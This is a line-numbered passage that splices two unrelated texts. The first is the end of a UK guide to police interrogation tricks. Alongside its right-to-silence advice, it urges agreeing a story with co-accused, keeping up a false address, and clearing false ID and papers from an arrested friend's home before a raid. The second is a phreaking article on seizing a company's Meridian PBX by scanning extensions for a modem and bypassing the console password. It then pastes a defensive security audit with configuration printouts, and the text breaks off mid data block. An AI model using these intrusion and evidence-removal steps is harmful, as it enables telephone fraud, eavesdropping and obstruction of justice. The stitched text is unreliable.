  2106. This is why they want you to speek. They need all the evidence they can get. 
  2107. One word could cause you a lot of trouble.
  2108.  
  2109. Q: SO I'VE GOT TO KEEP MY MOUTH SHUT. WHAT TRICKS CAN I EXPECT THE POLICE
  2110. TO PULL IN ORDER TO MAKE ME TALK?
  2111. The police try to get people to talk in many devious ways. The following
  2112. four pages show some pretty common examples, but remember they may try some
  2113. other line on you.
  2114.  
  2115. THESE ARE THINGS THAT OFTEN CATCH PEOPLE OUT
  2116. DON'T GET CAUGHT OUT
  2117.  
  2118. 1: "Come on now, we know it's you, your mate's in the next cell and he's
  2119. told us the whole story"
  2120.  
  2121. (If they've got the story, why do they need your confession? Plauing
  2122. co-accused off against each other is a common trick as you have no way of
  2123. checking what the other person is saying. If you are up to something dodgy
  2124. with other people, work out a story and stick to it. Plus you can't be
  2125. convicted just on the word of a co-accused.)
  2126.  
  2127.  
  2128. 2: "We know it's not you, but we know you know who's done it. Come on Jane,
  2129. don't be silly, tell us who done it"
  2130. ---
  2131. (The cops will use your first name to try and seem as though they're your
  2132. friends. If you are young they will act in a fartherly/motherly way, etc.)
  2133.  
  2134.  
  2135. 3: "As soon as we find out what happened you can go"
  2136.  
  2137. (Fat chance)
  2138.  
  2139.  
  2140. 4: "Look you little bastard. don't fuck us about. We've dealt with some
  2141. characters, a little runt like you is nothing to us. We know you did it,
  2142. you little shit and your going to tell us"
  2143.  
  2144.  
  2145. 5: "Whats a nice kid like you doing messed up in a thing like this?"
  2146.  
  2147. (They're trying to get at you)
  2148.  
  2149.  
  2150. 6: "We'll keep you in till you tell us"
  2151.  
  2152. (Unless they charge you with a 'serious offence' they have to release you
  2153. within 24 hours. Even if you are suspected of a 'serious offence' you have
  2154. the right to a solicitor after 36 hours, and only a magistrate can order you
  2155. to be heald without charge for longer)
  2156.  
  2157.  
  2158. 7: "You'll be charged with something far more serious if you don't answer
  2159. our questions, sonny. You're for the high jump. Your not going to see the
  2160. light of day for a long time. Start answering our questions cos we're
  2161. getting sick of you"
  2162.  
  2163. (Mental intimidation. They're unlikely to charge you with a serious offence
  2164. that won't stick in court. Don't panic)
  2165.  
  2166. 8: "My niece is a bit of a rebel"
  2167.  
  2168.  
  2169. 9: "If someone's granny gets mugged tonight it'll be your fault. Stop
  2170. wasteing our time by not talking"
  2171.  
  2172. (They're trying to make you feel guilty. Don't fall for it - did you ask to
  2173. be nicked or interviewed?)
  2174.  
  2175.  
  2176. 10: Mr Nice: "Hiya, whats it all about then? Sergent Smith says your in a
  2177. bit of trouble.  He's a bit wound up with you. You tell me what happened
  2178. and Smith won't bother you. He's not the best of our officers, he loses his
  2179. rag every now and again. So what happened?"
  2180.  
  2181. (Mr Nice is as devious as Mr Nasty. He or she will offer you a cuppa,
  2182. cigarettes, a blanket. It's the softly-softly approach. It's bollocks. 
  2183. 'No Comment')
  2184.  
  2185.  
  2186. 11: "We've been here for half an hour now and you've not said a fucking
  2187. word. Look you little cunt, some of the CID boys will be down in a minute. 
  2188. They'll have you talking in no time. Talk now or i'll bring then down"
  2189.  
  2190. (Keep at it, they're getting desperate. They're about to give up. You've
  2191. got a lot to lose by speaking)
  2192.  
  2193.  
  2194. 12: "Your girlfriend's outside. Do you want us to arrest her? We'll soon
  2195. have her gear off for a strip search. I bet she'll tell us. You're making
  2196. all this happen by being such a prick. Now Talk"
  2197.  
  2198. (They pick on weak spots, family, friends, etc. Gerry Conlon of the
  2199. guildford 4 was told that his mother would be shot by the RUC unless he
  2200. confessed. Cops sometimes do victimise prisoners families, but mostly
  2201. they're bluffing)
  2202.  
  2203.  
  2204. 13: "You're a fucking loony you! Who'd want you for a mother, you daft
  2205. bitch? Confess or your kids are going into care"
  2206.  
  2207.  
  2208. 14: "Look, we've tried to contact your solicitor, but we can't get hold of
  2209. them. It's going to drag on for an ages this way. Why don't you use one of
  2210. our duty solicitors, and we'll soon get this situation cleared up so you can
  2211. go home"
  2212.  
  2213. (Never accept an interview without your solicitor present, and don't make a
  2214. statement even if your solicitor advises you to - a good one won't)
  2215.  
  2216.  
  2217. 15: "You're obviously no dummy. I'll tell you what, we'll do a deal. You
  2218. admit to one of the charges and we'll drop the other two. You admit to it
  2219. and we'll recoment to the judge you get a non-castodial sentence, because
  2220. you've co-operated.  How does that sound?"
  2221.  
  2222. (They're trying to get you to do a deal. There are no deals to be made with
  2223. the police. This bloke got sent down for not paying a fine. The prisoner
  2224. he was hand-cuffed to in the prison bus did a deal with the police. He
  2225. pleaded guilty to a charge after being promised a non-castodial sentence. 
  2226. The man trusted the police, he was a small-time businessman accused of
  2227. fraud. When it came to court, the judge gave him two years, the bloke was
  2228. speechless)
  2229.  
  2230.  
  2231. 16: "We've been round to the address you gave and the people there say they
  2232. don't know you. We've checked up on the DSS computer and theres no sign of
  2233. you. Now come on, tell us who you are. Wasteing police time is a very
  2234. serious offence. Now tell us who you are or you've had it"
  2235.  
  2236. (If you've sorted out a false address with someone, make sure they're
  2237. reliable, and everyone in the place knows the name you're using. Stick at
  2238. it, if you're confident. You can't be charged for wasteing police time for
  2239. not answering questions)
  2240.  
  2241.  
  2242. 17: "They've abolished the right to silence - you have to tell us everything
  2243. now, it's the law"
  2244.  
  2245. (As we said at the beginning, you can still say nothing, there is no
  2246. obligation to tell the cops anything beyond your name, address and date of
  2247. birth)
  2248.  
  2249. ---
  2250. If you are nicked on very serious charges, or for serious violence to a
  2251. police officer, the cops may rough you up or use violence and torture to get
  2252. a confession (true or false) out if you.  Many of the people freed after
  2253. being fitted up by the West Midlands Serious Crime Squad or comming to light
  2254. now in manchester, were physically abused till they admitted to things they
  2255. hadn't done. If this happens, obviously it's your decision to speek rather
  2256. than face serious injury, but remember, what you say could land you inside
  2257. for a long time, even if it's not true. Don't rely on retracting a
  2258. confession in court - it's hard to back down once you've said something.
  2259.  
  2260. In the police station the cops rely on peoples naivety. If you are sussed
  2261. the chances are they'll give up on you. In these examples we have tried to
  2262. show how they'll needle you to speek. Thats why you have to know what to do
  2263. when you're arrested. The hassle in the copshop, but if you are on the
  2264. ball, you can get off. You have to be prepared. We've had a lot of
  2265. experience with the police and we simply say:
  2266.  
  2267. 1: Keep calm and cool when arrested (remember you are on their home ground)
  2268. 2: Get a solicitor
  2269. 3: Never make a statement
  2270. 4: Don't get drawn into conversations with the police
  2271. 5: If they rough you up, see a doctor immediately after being released. Get
  2272. a written report of all bruising and marking. Remember the officers names
  2273. and numbers if possible
  2274.  
  2275. Having said nothing in the police station, you can then look at the evidence
  2276. and work out you alibi, your side of the story.
  2277.     THIS IS HOW YOU WILL GET OFF
  2278.  
  2279. REMEMBER:
  2280. An interview is a no-win situation. You are not abliged to speek. If the
  2281. police want to interview you, it shows you're in a good position...
  2282.  
  2283. ...And the only way to stay in that position is to refuse to be drawn into
  2284. any conversation and answer "NO COMMENT" to any questions
  2285.  
  2286.  
  2287. Q: WHAT CAN I DO IF ONE OF MY FRIENDS IS ARRESTED?
  2288. If someone you know is arrested there's a lot you can do to help them from
  2289. the outside.
  2290.  
  2291. 1. If you know what name they are using as soon as you think they've been
  2292. arrested, ring the police station. Ask whether they are being held there
  2293. and on what charges
  2294. 2. Inform a decent solicitor
  2295. 3. Remove anything from the arrested persons house that the police may find
  2296. interesting: letters, address books, false ID, etc, incase the police raid
  2297. the place
  2298. 4. Take food, cigarettes, etc, into the police station for your arrested
  2299. friend. BUT don't go into enquire at the police station to ask about a
  2300. prisoner if you run the risk of arrest yourself. You'll only get arrested.
  2301.  
  2302. The police have been known to lay off a prisoner if they have visible
  2303. support from the outside. It's solidarity which keeps prisoners in good
  2304. spirits.
  2305.  
  2306.         SUPPORT PRISONERS
  2307. .
  2308. :
  2309. |
  2310. +-+[ meridian security audit /switch hacking ]+---> by hybrid <--------------+
  2311. +-+[ D4RKCYDE                                ]+---> hybrid@dtmf.org <--------+
  2312.                                                                              |
  2313.                                                                              :
  2314.                                                                              .
  2315.  
  2316.  
  2317.     .    ..  ... .......... BL4CKM1LK teleph0nics .......... ...  ..    .
  2318.     .    ..  ... .......... http://hybrid.dtmf.org ......... ...  ..    .
  2319.  
  2320.  
  2321. Meridian I Switch and Trunk Interception.......... .....     ...        .      
  2322. An account of how an ENTIRE companys PBX.......... .....     ...        .
  2323. can be taken over (The hardcore phreak way)....... .....     ...        .
  2324. by hybrid <hybrid@dtmf.org hybrid@ninex.com>...... .....     ...        .
  2325.  
  2326.  
  2327. Hi. I'm not going to write a mad big introduction to this article, because
  2328. I dont feel their is a need for one. All I want to say here is that this
  2329. article is intended for the more "hardcore" phreak, yes, hardcore phreak, not
  2330. for lame ass calling card leeching kiddies who call themsleves phreaks. If
  2331. you are intersted in hacking telephony switches, and you have prior/prefixed
  2332. knowledge of Meridian, read on..
  2333.  
  2334. Through my experience, I've seen alot of meridian admins go through many
  2335. different and sometimes repetitive lengths to supposidly secure an internal
  2336. PSTN connected PABX. In this article I'm going to share my knowledge of
  2337. PBX switch hacking, and enlighten you to the intricate techneques that can
  2338. be used to "trunk hop" etc. The information provided in this article has been
  2339. obtained from my own personal accounts of hacking telephony switches, which
  2340. I'd like to state, I don't participate in anymore.
  2341.  
  2342. Now, for the sake of timesaving, I'll setup a possible scenario.. Consider
  2343. the following:
  2344.  
  2345.         o You have stumbled accross a nice Meridian Mail system, which you
  2346.           have already compromised by finding yourself a few boxdes in their.
  2347.           You discover that the Meridian Mail system you have gained access
  2348.           to belongs to a certain telco, and is used for internal
  2349.           communication between emloyees high up in the hierarchial chain.
  2350.  
  2351. Now, any "normal" phreak would gradually take over the system by finding as
  2352. many free boxes as possible and hnading them over to friends, or would keep
  2353. the nice lil' system to themselves as a means of obtaining information about
  2354. the telco that owns the PBX, via the the means of eavesdroping on used
  2355. voicemail boxes. This is a very primitive form of remote eavesdroping, which
  2356. this file is not designed to illistrate.
  2357.  
  2358. Meridian PBX systems are all administered by a primary system console, which
  2359. can be remotely accessed by many different protocols. The most popular of
  2360. which is remote dialup via assigned extensions. If the companys main switch
  2361. is centrex based, it is likely that the meridian admin console is accessable
  2362. via IP on the companys intranet. If you manage to gain access to the
  2363. actual switching conponment, you are likely to have the following privalges
  2364. on the meridian based network:
  2365.  
  2366.         o 100% control over every single inbound/outbound trunk group
  2367.         o Access to every single voicemail box on the switch
  2368.         o Access to trunk/group/node administration
  2369.  
  2370. Basically, the meridian administration module is designed to make the admin
  2371. (or whoever has access to it) GOD over the entire system, I say GOD because
  2372. you could do anything you wanted, as far as your telephony derived
  2373. imagination extends. OK, enough of this.. I'm just going to stop going on
  2374. about what if's for the time being, now I'm going to concentrate on the
  2375. factual based information, and how one would go about accessing such a
  2376. switch.
  2377.  
  2378. The simpilist way to find the internal dialup to a meridian switch is to
  2379. scan the internal extensions which the switch controls. It's generaly a
  2380. good idea to begin scanning network/node extensions such as 00,01,02,03[xx]
  2381. etc. What you are looking for is a modem carrier, which when you connect
  2382. should ask you for a singular password, which in most cases is bypassed
  2383. by hitting control-SD. Once you are in, you should recieve the switches
  2384. command line prompt, somthing similar to this:
  2385.  
  2386. >
  2387.  
  2388. or
  2389.  
  2390. SWITCH0>
  2391.  
  2392. OMG, I hear you think.. It looks like a DMS switch prompt.. Well, it is, in
  2393. a funny kind of way. Meridian switches are designed to emualte certain levels
  2394. of DMS-100 O/S types, so you'll find that many of the BCS leveled commands
  2395. that you know from DMS will be usefull here. The information that follows
  2396. has been obtained from public Meridian Mail Administration sources on the
  2397. net..
  2398.  
  2399. /*
  2400.  
  2401. Basic Meridian 1 Security Audit 
  2402. -------------------------------
  2403.  
  2404.         "Users will go nuts calling a radio station to win a free toaster,
  2405.          taking over all the trunks in your phone system."
  2406.  
  2407. An audit of the Meridian 1 telephone system will ensure that every possible
  2408. "system" precaution has been made to prevent fraud. The first step involves
  2409. querying data from the system in the form of printouts (or "capturing" the
  2410. data to a file in a PC). The next step is to analyze the data and confirm the
  2411. reason for each entry. Please be advised that this procedure is not designed
  2412. for all "networked" Meridian 1 systems, however, most of the items apply to
  2413. all systems. Use at your own risk.
  2414.  
  2415. PRINTOUTS REQUIRED FOR SECURITY AUDIT: It is suggested that you "capture" all
  2416. of the data from these printouts to separate files. This can be accomplished
  2417. with a PC and communications program. For the BARS LD90 NET printout, try
  2418. this file. (enclosed in faith10.zip barparse.zip)
  2419.  
  2420. ------------------------------------------------------------------------------
  2421. LD22 CFN                LD22 PWD        LD21 CDB             LD21 RDB
  2422. LD21 LTM                LD23 ACD        LD24 DISA            LD20 SCL 
  2423. LD86 ESN                LD86 RLB        LD86 DMI             LD87 NCTL 
  2424. LD87 FCAS               LD87 CDP        LD90 NET             LD90 SUM 
  2425. LD20 TNB                LD22 DNB        LD88 AUB 
  2426. ------------------------------------------------------------------------------
  2427.  
  2428. GATHERING DATA FROM LD81
  2429. ------------------------
  2430. List (LST) the following FEAT entries to form an information base on the
  2431. telephones.
  2432.  
  2433. ------------------------------------------------------------------------------
  2434. NCOS 00 99              CFXA            UNR             TLD             SRE
  2435. FRE                     FR1             FR2             CUN             CTD
  2436. ------------------------------------------------------------------------------
  2437.  
  2438. DATA BLOCK REVIEW ITEMS
  2439. -----------------------
  2440. From the printouts, a review of the following areas must be made. Some of the
  2441. items may or may not be appropriate depending on the applications of the
  2442. telephone system.
  2443.  
  2444.  
  2445. ------------------------------------------------------------------------------
  2446. CFN - Configuration     Verify that History File is in use.
  2447. ------------------------------------------------------------------------------
  2448. PWD - Passwords         Verify that FLTH (failed login attempt threshold) is
  2449.                         low enough. Verify that PWD1 and PWD2 (passwords) use
  2450.                         both alpha and numeric characters and are eight or
  2451.                         more characters long. Note any LAPW's (limited access
  2452.                         passwords) assigned. Enable audit trails. 
  2453. ------------------------------------------------------------------------------
  2454. CDB - Customer          Verify that CFTA (call forward to trunk access code)
  2455. Data Block              is set to NO. Verify NCOS level of console. Verify
  2456.                         that NIT1 through NIT4 (or other night numbers) are
  2457.                         pointing to valid numbers. EXTT prompt should be NO
  2458.                         to work in conjunction with trunk route disconnect
  2459.                         controls (See RDB)
  2460. ------------------------------------------------------------------------------
  2461. RDB - Trunk Route       Verify that every route has a TARG assigned. Confirm
  2462. Data Block              that FEDC and NEDC are set correctly. ETH is typical,
  2463.                         however for maximum security in blocking trunk to
  2464.                         trunk connections, set NEDC to ORG and FEDC to JNT
  2465.                         Confirm that ACCD's are a minimum of four digits long
  2466.                         (unless for paging). If ESN signaling is active on
  2467.                         trunk routes, verify that it needs to be. ESN
  2468.                         signaling, if not required, should be avoided. NOTES
  2469.                         ON TGAR: For demonstration purposes, this document
  2470.                         suggests that sets be a "TGAR 1". The only
  2471.                         requirement for TGAR is that it match one of the TARG
  2472.                         numbers assigned in the Route Data Block 
  2473. ------------------------------------------------------------------------------
  2474. ACD - Automatic         Verify ACD queues and associated NCFW numbers.
  2475. Call Distrobution       Verify all referenced extensions. 
  2476. ------------------------------------------------------------------------------
  2477. DISA - Direct           Remove DISA if not required. If required, verify that
  2478. Inward System           security codes are in use.
  2479. Access
  2480. ------------------------------------------------------------------------------
  2481. ESN - Electronic        AC1 is typically "9". If there is an AC2 assigned,
  2482. Switched Network        verify its use. If TOD or ETOD is used - verify what
  2483.                         NCOS levels are changed, when they are changed and
  2484.                         why they are changed. Apply FLEN to your SPNs to
  2485.                         insure nobody is ever allowed to be transferred to a
  2486.                         partially dialed number, like "Transfer me to 91800"
  2487.                         Study EQAR (Equal Access Restriction) to insure that
  2488.                         users can only follow a "Carrier Access Code" with a
  2489.                         zero rather than a one:   (1010321-1-414-555-1212 is
  2490.                         blocked but 1010321-0-414-555-1212 is allowed with
  2491.                         EQAR) 
  2492. ------------------------------------------------------------------------------
  2493. NCTL - Network          Use LD81 FEAT PRINT to verify all NCOS being used.
  2494. Control                 Does NCOS 0 = FRL 0? Does NCOS X always equal FRL X
  2495.                         in the NCTL? Does FRL 0 have any capabilities? - It
  2496.                         should not be able to dial anything. 
  2497. ------------------------------------------------------------------------------
  2498. FCAS - Free Call        Confirm the need to use FCAS and remove it if
  2499. Screening               possible. FCAS is usually a waste of system memory
  2500.                         and complicates the system without saving money. 
  2501. ------------------------------------------------------------------------------
  2502. DGT (DMI) - Digit       Confirm all numbers referenced in the "insert"
  2503. Manipulation            section of each DMI table. 
  2504. ------------------------------------------------------------------------------
  2505. RLB - BARS Route        Are any RLB ENTR'S assigned FRL 0 - typically, only
  2506. List Block              the RLB that handles 911 calls should have an FRL 0.
  2507.                         If DMI is in use, confirm all "inserted" numbers. 
  2508. ------------------------------------------------------------------------------
  2509. CDP - BARS              Are all CDP numbers valid? Check the RLBs they point
  2510. Coordinated             to and see what the DMI value is. Confirm insertions.
  2511. Dialing Plan
  2512. ------------------------------------------------------------------------------
  2513. NET - ALL - BARS        Add 000,001,002,003,004,005,006,007,008,009 as SPNs
  2514. Network Numbers         pointing to a route list block that is set to LTER
  2515.                         YES. These entries block transfers to "ext. 9000" and
  2516.                         similar numbers. Point SPN "0" to a RLI with a high
  2517.                         FRL, then consider adding new SPNs of 02, 03, 04, 05,
  2518.                         06, 07, 08, 09 to point to a RLI with a lower FRL so
  2519.                         that users cannot dial "0", but can dial "0+NPA
  2520.                         credit card calls. Check FRL of 0, 00, 011 and
  2521.                         confirm that each is pointed to separate NET entry
  2522.                         requiring a high FRL. Remove all of shore NPAs (Like
  2523.                         1-809 Dominican Republic) if possible. Regulations
  2524.                         are almost non-existent in some of those areas and
  2525.                         they are hot fraud targets. Verify blocking 900 and
  2526.                         976 access. Also consider blocking the NXX of your
  2527.                         local radio station contest lines. Users will go nuts
  2528.                         calling a radio station to win a free toaster, taking
  2529.                         over all the trunks in your phone system. Restrict
  2530.                         the main numbers and DID range within the BARS
  2531.                         system. There is no need to call from an outgoing to
  2532.                         an incoming line at the same location.
  2533. ------------------------------------------------------------------------------
  2534. TRUNKS                  Confirm that all trunks have TGAR assigned. Confirm
  2535.                         that all incoming and TIE trunks have class of
  2536.                         service SRE assigned. (caution on networked systems) 
  2537.                         Confirm that all trunks have an NCOS of zero. 
  2538.                         NOTES ON TGAR: For demonstration purposes, this
  2539.                         document suggests that sets be a "TGAR 1". The only
  2540.                         requirement for TGAR is that it match one of the TARG
  2541.                         numbers assigned in the Route Data Block 
  2542. ------------------------------------------------------------------------------
  2543. SETS-PHONES             Does every phone have a TGAR of 1 assigned? (This
  2544.                         must be checked set by set, TN by TN). Can you change
  2545.                         every phone that is UNR to CTD? Review LD81 FEAT
  2546.                         PRINT to find out the UNR sets. CTD class of service
  2547.                         is explained below. Confirm that all sets are
  2548.                         assigned CLS CFXD? Confirm that the NCOS is
  2549.                         appropriate on each set. In Release 20 or above,
  2550.                         removing transfer feature may be appropriate. Confirm
  2551.                         that all sets CFW digit length is set to the system
  2552.                         DN length. NOTES ON TGAR: For demonstration purposes,
  2553.                         this document suggests that sets be a "TGAR 1". The
  2554.                         only requirement for TGAR is that it match one of the
  2555.                         TARG numbers assigned in the Route Data Block Apply
  2556.                         Flexible Trunk to Trunk Connections on the set, and
  2557.                         FTOP in the CDB if deemed appropriate.  These
  2558.                         restrictions are done on a set by set basis and allow
  2559.                         or deny the ability to transfer incoming calls out of
  2560.                         the facility.
  2561. ------------------------------------------------------------------------------
  2562. VOICE MAIL PORTS        Each port should be CLS of SRE Each port should be
  2563.                         NCOS 0 - NCOS 0 must be known to be too low to pass
  2564.                         any call Each port should be TGAR 1 (all trunk routes
  2565.                         must be TARG 1 also) NOTES ON TGAR: For demonstration
  2566.                         purposes, this document suggests that sets be a
  2567.                         "TGAR 1". The only requirement for TGAR is that it
  2568.                         match one of the TARG numbers assigned in the Route
  2569.                         Data Block NOTE:  If you are used to your Mail system
  2570.                         doing outcalling, you can forget about that working
  2571.                         after applying these restrictions. 
  2572. ------------------------------------------------------------------------------
  2573.  
  2574. CLASS OF SERVICE AND TRUNK GROUP ACCESS RESTRICTIONS:
  2575. -----------------------------------------------------
  2576. EXPLANATION OF CLASS OF SERVICE SRE: 
  2577. ------------------------------------
  2578. NTP DEFINITION: Allowed to receive calls from the exchange network.
  2579. Restricted from all dial access to the exchange network. Allowed to access
  2580. the exchange network through an attendant or an unrestricted telephone only.
  2581. Essentially, an SRE set can do nothing on it's own except dial internal and
  2582. TIE line extensions. If a trunk is SRE - it will work normally and allow
  2583. conference calls and transfers. 
  2584.  
  2585. EXAMPLES OF 'SRE' IN USE: 
  2586. -------------------------
  2587. Voice Mail cannot connect to an outgoing line, but can receive incoming
  2588. calls. Callers on the far end of a TIE line cannot call out through your end
  2589. (for their sake, both ends should be SRE). 
  2590.  
  2591. EXPLANATION OF CLASS OF SERVICE CTD: 
  2592. ------------------------------------
  2593. If a route access code is accessed (if there was no match between the TGAR
  2594. and TARG), the caller cannot dial 1 or 0 as the leading digits. If the caller
  2595. makes a "dial 9" BARS call, the NCOS will control the call.
  2596.  
  2597. EXPLANATION OF TGAR AND TARG: 
  2598. -----------------------------
  2599. The best restriction is to have all trunk routes TARG'd to 1 and all TNs
  2600. (including actual trunk TNs) TGAR'd to 1. This will block all access to
  2601. direct trunk route selection. 
  2602.  
  2603. BENEFITS OF IMPLEMENTING THESE SECURITY RESTRICTIONS 
  2604. ----------------------------------------------------
  2605. No incoming caller will have access to an outside line unless physically
  2606. transferred or conferenced by an internal party. If voice mail ports are SRE
  2607. and NCOS 0 and have a TGAR matching the TARG - they will not be able to
  2608. transfer a call out of the system, regardless of the voice mail system's
  2609. resident restrictions assigned. No phone will be able to dial a trunk route
  2610. access code. Consider allowing telecom staff this ability for testing. 
  2611.  
  2612. Layered security:
  2613. -----------------
  2614. If in phone programming, TGAR was overlooked on a phone, the CTD class of
  2615. service would block the user from dialing a 0 or 1 if they stumble upon a
  2616. route access code. If in programming, the CTD class of service was
  2617. overlooked, both TGAR and NCOS would maintain the restrictions. If in
  2618. programming, the NCOS is overlooked, it will defaults to zero, which is
  2619. totally restricted if NCTL and RLBs are set up correctly.
  2620.  
  2621.  
  2622. Quick Tour of a Simple Meridian 1 BARS Call
  2623. -------------------------------------------
  2624. Basic Automatic Route Selection. If you dial "9", you are accessing BARS.
  2625. "9" is the "BARS Access Code" 
  2626.  
  2627.    1. A telephone dials "9" - BARS activates. 
  2628.    2. The telephone calls a number - Example: 1-312-XXX-XXXX 
  2629.    3. The PBX hold the digits while it looks up "1-312" to figure out what
  2630.       Route List to use for processing the call. 
  2631.    4. The Route List determines the possible trunk routes that can be used. 
  2632.    5. The Route List checks the facility restriction level of the telephone
  2633.       and compares it to its own required facility restriction level. 
  2634.    6. The Route List checks to see if any special digit manipulation should
  2635.       be performed.
  2636.  
  2637. LD90 NET
  2638. --------
  2639. The LD90 Network overlay is where area codes and exchanges are defined. If a
  2640. prefix is not entered into LD90, it cannot be dialed through BARS. Each area
  2641. code or exchange refers to a "Route List" or RLI which contains the
  2642. instructions for routing the call.
  2643.  
  2644. >ld 90
  2645. ESN000
  2646.  
  2647. REQ prt
  2648. CUST 0
  2649. FEAT net
  2650. TRAN ac1
  2651. TYPE npa
  2652.  
  2653. NPA 1312
  2654.  
  2655. NPA 1312 <-- This is the network number (prefix)
  2656. RLI 11   <-- This is the Route List that the prefix gets instruction from
  2657. DENY 976 <-- This is an exchange in NPA 312 that is blocked
  2658.  
  2659. SDRR DENY CODES = 1
  2660. DMI 0
  2661. ITEI NONE
  2662.  
  2663. REQ end
  2664.  
  2665.  
  2666. LD86 RLB (or RLI)
  2667. -----------------
  2668. The RLB is a "list" of possible trunk routes that an area code or exchange
  2669. can be dialed over. Each "ENTR" or list entry contains a trunk route. Each
  2670. entry also has a "minimum Facility Restriction Level" or "FRL" that must be
  2671. met before a phone can access that entry. In the following example, the first
  2672. entry can be accessed by phones whose NCOS equals an FRL of 3 or above. The
  2673. second entry can only be accessed by phones whose NCOS equals an FRL of 6 or
  2674. above. Along with the trunk route and the FRL, you can apply specific "digit
  2675. manipulation" with the DMI entry. The DMI entries are explained here.
  2676.  
  2677. >ld 86
  2678. ESN000
  2679.  
  2680. REQ prt
  2681. CUST 0
  2682. FEAT rlb
  2683. RLI 11
  2684.  
  2685. RLI 11
  2686. ENTR 0  <-- This is the list's first "Entry Number"
  2687. LTER NO
  2688. ROUT 15 <-- This is the first choice Trunk Route Number
  2689. TOD 0 ON 1 ON 2 ON 3 ON
  2690.     4 ON 5 ON 6 ON 7 ON
  2691. CNV NO
  2692. EXP NO
  2693. FRL 3  <-- This is the Facility Restriction Level
  2694. DMI 10 <-- This is the Digit Manipulation Index Number
  2695. FCI 0
  2696. FSNI 0
  2697. OHQ YES
  2698. CBQ YES
  2699.  
  2700. ENTR 1 <-- This is the list's second "Entry Number"
  2701. LTER NO
  2702. ROUT 9 <-- This is the second choice Trunk Route Number
  2703. TOD 0 ON 1 ON 2 ON 3 ON
  2704.     4 ON 5 ON 6 ON 7 ON
  2705. CNV NO
  2706. EXP YES <-- This is considered the "expensive" choice
  2707. FRL 6   <-- Note that the Facility Restriction Level is higher
  2708. DMI 0   <-- Note no digit manipulation is required for this trunk
  2709. route
  2710. FCI 0
  2711. FSNI 0
  2712. OHQ YES
  2713. CBQ YES
  2714.  
  2715. ISET 2
  2716. MFRL 3
  2717.  
  2718. REQ end
  2719.  
  2720.  
  2721. LD87 NCTL
  2722. ---------
  2723. The FRL to NCOS "relationship" is built in the NCTL data block. The FRL and
  2724. the NCOS do not necessarily have the equal one another, however they usually
  2725. do. A higher FRL/NCOS has more capability than a lower FRL/NCOS. For an NCOS
  2726. number to have any capability, it must first be defined in the NCTL data
  2727. block.
  2728.  
  2729. >ld 87
  2730. ESN000
  2731.  
  2732. REQ prt
  2733. CUST 0
  2734. FEAT nctl
  2735. NRNG 0 7 <-- Range from NCOS 0 through 7 was requested
  2736.  
  2737. SOHQ NO
  2738. SCBQ YES
  2739. CBTL 10
  2740. ---------------
  2741. NCOS 0
  2742.  
  2743. EQA NO
  2744. FRL 0
  2745. RWTA NO
  2746. NSC NO
  2747. OHQ NO
  2748. CBQ NO
  2749. MPRI 0
  2750. PROM 0
  2751. ---------------
  2752. NCOS 1
  2753.  
  2754. EQA NO
  2755. FRL 1
  2756. RWTA NO
  2757. NSC NO
  2758. OHQ NO
  2759. CBQ YES
  2760. RETT 10
  2761. RETC 5
  2762. ROUT I
  2763. RADT 0
  2764. SPRI 0
  2765. MPRI 0
  2766. PROM 0
  2767. ---------------
  2768. NCOS 2
  2769.  
  2770. EQA NO
  2771. FRL 0
  2772. RWTA NO
  2773. NSC NO
  2774. OHQ NO
  2775. CBQ NO
  2776. MPRI 0
  2777. PROM 0
  2778. ---------------
  2779. NCOS 3
  2780.  
  2781. EQA NO
  2782. FRL 3 <-- NCOS 3 equals FRL 3.
  2783. RWTA YES
  2784. NSC NO
  2785. OHQ NO
  2786. CBQ YES
  2787. RETT 10
  2788. RETC 5
  2789. ROUT I
  2790. RADT 10
  2791. SPRI 0
  2792. MPRI 0
  2793. PROM 0
  2794. ---------------
  2795. NCOS 4
  2796.  
  2797. EQA NO
  2798. FRL 4
  2799. RWTA YES
  2800. NSC NO
  2801. OHQ NO
  2802. CBQ YES
  2803. RETT 10
  2804. RETC 5
  2805. ROUT A
  2806. RADT 10
  2807. SPRI 0
  2808. MPRI 0
  2809. PROM 0
  2810. ---------------
  2811. NCOS 5
  2812.  
  2813. EQA NO
  2814. FRL 5
  2815. RWTA NO
  2816. NSC NO
  2817. OHQ NO
  2818. CBQ YES
  2819. RETT 10
  2820. RETC 5
  2821. ROUT A
  2822. RADT 10
  2823. SPRI 0
  2824. MPRI 0
  2825. PROM 0
  2826. ---------------
  2827. NCOS 6
  2828.  
  2829. EQA NO
  2830. FRL 6 <-- NCOS 6 equals FRL 6.
  2831. RWTA NO
  2832. NSC NO
  2833. OHQ NO
  2834. CBQ YES
  2835. RETT 10
  2836. RETC 5
  2837. ROUT A
  2838. RADT 0
  2839. SPRI 0
  2840. MPRI 0
  2841. PROM 0
  2842. ---------------
  2843. NCOS 7
  2844.  
  2845. EQA NO
  2846. FRL 7
  2847. RWTA NO
  2848. NSC NO
  2849. OHQ NO
  2850. CBQ YES
  2851. RETT 10
  2852. RETC 5
  2853. ROUT A
  2854. RADT 0
  2855. SPRI 0
  2856. MPRI 0
  2857. PROM 0
  2858.  
  2859. TOHQ NONE
  2860.  
  2861.  
  2862. LD86 Digit Manipulation
  2863. -----------------------
  2864. The Digit Manipulation data blocks are where special prefixes are entered
  2865. before numbers are sent out over trunks. An example of digit manipulation is
  2866. where a 1010XXX carrier access code must be inserted before a number is
  2867. processed over a trunk.
  2868.  
  2869. REQ prt
  2870. CUST 0
  2871. FEAT dgt
  2872. DMI 10
  2873.  
  2874. DMI 10 <-- This is simply the index number.
  2875. DEL 1  <-- This says "delete the first digit after "9"
  2876. CTYP NCHG
  2877.  
  2878. REQ prt
  2879. CUST 0
  2880. FEAT dgt
  2881. DMI 3
  2882.  
  2883. DMI 3
  2884. DEL 0       <-- This says "delete nothing after 9"
  2885. INST 101288 <-- This says "Insert 101288 after 9 and before the actual number
  2886.                 dialed"
  2887. CTYP NCHG
  2888.  
  2889. REQ end
  2890.  
  2891.  
  2892. Telephone
  2893. ---------
  2894. This is simply a telephone's data block
  2895.  
  2896. DES 5135
  2897. TN 004 0 14 00
  2898. TYPE 500
  2899. CDEN 4D
  2900. CUST 0
  2901. DN 5135 MARP
  2902.      CPND
  2903.      NAME Typical User
  2904.      XPLN 9
  2905.      DISPLAY_FMT FIRST,LAST
  2906. AST NO
  2907. IAPG 0
  2908. HUNT
  2909. TGAR 1
  2910. LDN NO
  2911. NCOS 5  <-- What FRL does this equal?
  2912. SGRP 0
  2913. RNPG 0
  2914. LNRS 16
  2915. XLST
  2916. SCI 0
  2917. CLS CTD DTN FBD XFA WTA THFD FND HTD ONS
